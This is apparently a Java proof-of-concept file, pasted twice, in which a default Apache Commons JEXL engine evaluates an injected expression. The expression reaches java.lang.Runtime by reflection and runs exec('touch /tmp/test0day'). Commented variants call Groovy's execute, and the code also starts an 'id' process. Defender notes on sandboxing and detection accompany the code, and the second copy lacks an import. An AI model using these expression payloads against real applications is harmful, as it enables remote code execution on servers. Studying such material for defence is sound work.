import java.io.IOException;
import java.util.List;
import org.apache.commons.jexl3.JexlBuilder;
import org.apache.commons.jexl3.JexlContext;
import org.apache.commons.jexl3.JexlEngine;
import org.apache.commons.jexl3.JexlExpression;
import org.apache.commons.jexl3.MapContext;
import org.codehaus.groovy.runtime.ProcessGroovyMethods;
/**
 * Proof of concept showing what a JEXL engine built with default settings is asked to do when it
 * evaluates an attacker-shaped expression: the expression text reaches {@code java.lang.Runtime}
 * through {@code forName} on a literal's class and calls {@code exec}.
 *
 * <p>Reviewer notes for defenders:
 * <ul>
 *   <li>The engine comes from {@code new JexlBuilder().create()} with no sandbox, permissions or
 *       class-loader restriction configured, so nothing in this listing limits which classes an
 *       expression may reach. Whether the call actually succeeds depends on the JEXL release and
 *       its built-in defaults, which this listing does not pin.</li>
 *   <li>The risk applies to any code path that hands externally supplied text to
 *       {@code createExpression}/{@code evaluate}. Treat expression text as code: do not accept it
 *       from untrusted input, and configure the builder with a {@code JexlSandbox}
 *       ({@code JexlBuilder.sandbox(...)}) or, where the release provides it, restricted
 *       {@code JexlPermissions} ({@code JexlBuilder.permissions(...)}) that allow only the
 *       classes the application needs.</li>
 *   <li>Detection: an expression evaluation that ends in a child process of the JVM is the
 *       observable effect; process-creation telemetry on the Java service is where it shows.</li>
 * </ul>
 */
public class elExp {

    // Alternative expressions the author left disabled:
    //String jexlExp = "new(\"java.lang.String\", \"hello wolrd\")";
    //String jexlExp = "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch /tmp/jexlExp0day\")";

    /** Expression under test; its only intended effect is creating a marker file under /tmp. */
    private static final String EXPRESSION_TEXT =
            "1.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"touch /tmp/test0day\")";

    /**
     * Parses the expression, starts an unrelated {@code id} process from plain Java, then
     * evaluates the expression and prints whatever it returns.
     *
     * @param args unused
     * @throws IOException declared by the original signature; the only visible I/O failure is
     *     already caught inside the method
     */
    public static void main(String[] args) throws IOException {
        // Default engine: no sandbox or permissions are set on the builder.
        JexlEngine engine = new JexlBuilder().create();
        JexlExpression parsed = engine.createExpression(EXPRESSION_TEXT);

        // This process is started directly by Java, not through JEXL, and its output is never
        // read. NOTE(review): looks like a leftover host sanity check; confirm it is needed.
        try {
            new ProcessBuilder("id").start();
        } catch (IOException spawnFailure) {
            spawnFailure.printStackTrace();
        }

        // The variable "foo" is bound to the expression text, but the expression never reads it.
        JexlContext context = new MapContext();
        context.set("foo", EXPRESSION_TEXT);

        // Evaluation is the step that performs the reflective call chain in the expression.
        System.out.println(parsed.evaluate(context));
    }
}
import java.util.List;
import org.apache.commons.jexl3.JexlBuilder;
import org.apache.commons.jexl3.JexlContext;
import org.apache.commons.jexl3.JexlEngine;
import org.apache.commons.jexl3.JexlExpression;
import org.apache.commons.jexl3.MapContext;
import org.codehaus.groovy.runtime.ProcessGroovyMethods;
/**
 * Second copy of the JEXL evaluation demo: a default {@code JexlEngine} is given an expression
 * that obtains {@code java.lang.Runtime} reflectively and invokes {@code exec}.
 *
 * <p>What a reviewer should take from it: {@code new JexlBuilder().create()} applies no sandbox
 * or permission set in this listing, so the expression language is as powerful as the classes on
 * the classpath. Applications that evaluate user-influenced expressions need an allow-list
 * ({@code JexlSandbox} or, where available, restricted {@code JexlPermissions}) set on the
 * builder, and should alert on the JVM spawning child processes.
 *
 * <p>NOTE(review): the import list printed before this copy has no {@code java.io.IOException}
 * line, so this copy would not compile as listed.
 */
public class elExp {

    /**
     * Builds the engine, parses the fixed expression, starts {@code id} directly from Java,
     * evaluates the expression against a one-entry context and prints the result.
     *
     * @param args unused
     * @throws IOException declared by the original signature; the {@code ProcessBuilder} failure
     *     is caught and printed inside the method
     */
    public static void main(String[] args) throws IOException {
        // No sandbox, permissions or class loader are configured on the builder.
        final JexlEngine engine = new JexlBuilder().create();

        // Disabled variants kept from the original listing:
        //String jexlExp = "new(\"java.lang.String\", \"hello wolrd\")";
        //String jexlExp = "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch /tmp/jexlExp0day\")";
        final String expressionText =
                "1.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"touch /tmp/test0day\")";
        final JexlExpression expression = engine.createExpression(expressionText);

        // Independent of JEXL: a process started by ordinary Java code, output discarded.
        // NOTE(review): purpose is not stated in the listing; confirm before keeping it.
        try {
            new ProcessBuilder("id").start();
        } catch (IOException startError) {
            startError.printStackTrace();
        }

        // "foo" holds the expression text; the expression itself does not reference "foo".
        final JexlContext variables = new MapContext();
        variables.set("foo", expressionText);

        // The reflective chain in the expression runs here; the returned object is printed.
        final Object outcome = expression.evaluate(variables);
        System.out.println(outcome);
    }
}